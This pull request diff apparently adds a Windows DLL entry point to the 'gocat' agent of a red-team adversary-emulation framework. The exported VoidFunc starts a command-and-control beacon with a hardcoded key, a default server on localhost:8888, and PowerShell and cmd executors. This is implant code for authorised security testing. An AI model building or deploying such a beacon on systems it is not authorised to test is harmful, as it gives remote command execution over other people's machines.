### PR TITLE
virts-434f: shared library support for windows

### DIFF
--- a/gocat/shared/shared_windows.go
+++ b/gocat/shared/shared_windows.go
@@ -1,0 +1,21 @@
+package main
+
+import "C"
+import (
+	"../core"
+)
+
+var (
+	key = "JWHQZM9Z4HQOYICDHW4OCJAXPPNHBA"
+	defaultServer = "http://localhost:8888"
+	defaultGroup = "my_group"
+	defaultSleep = "60"
+	defaultExeName = "shared.dll"
+)
+
+//export VoidFunc
+func VoidFunc() {
+	core.Core(defaultServer, defaultGroup, defaultSleep, 0, defaultExeName, []string{"psh","cmd"}, false)
+}
+
+func main() {}


### PR DESCRIPTION
additional default rendering parameters added to avoid adding parameters to the DLL execution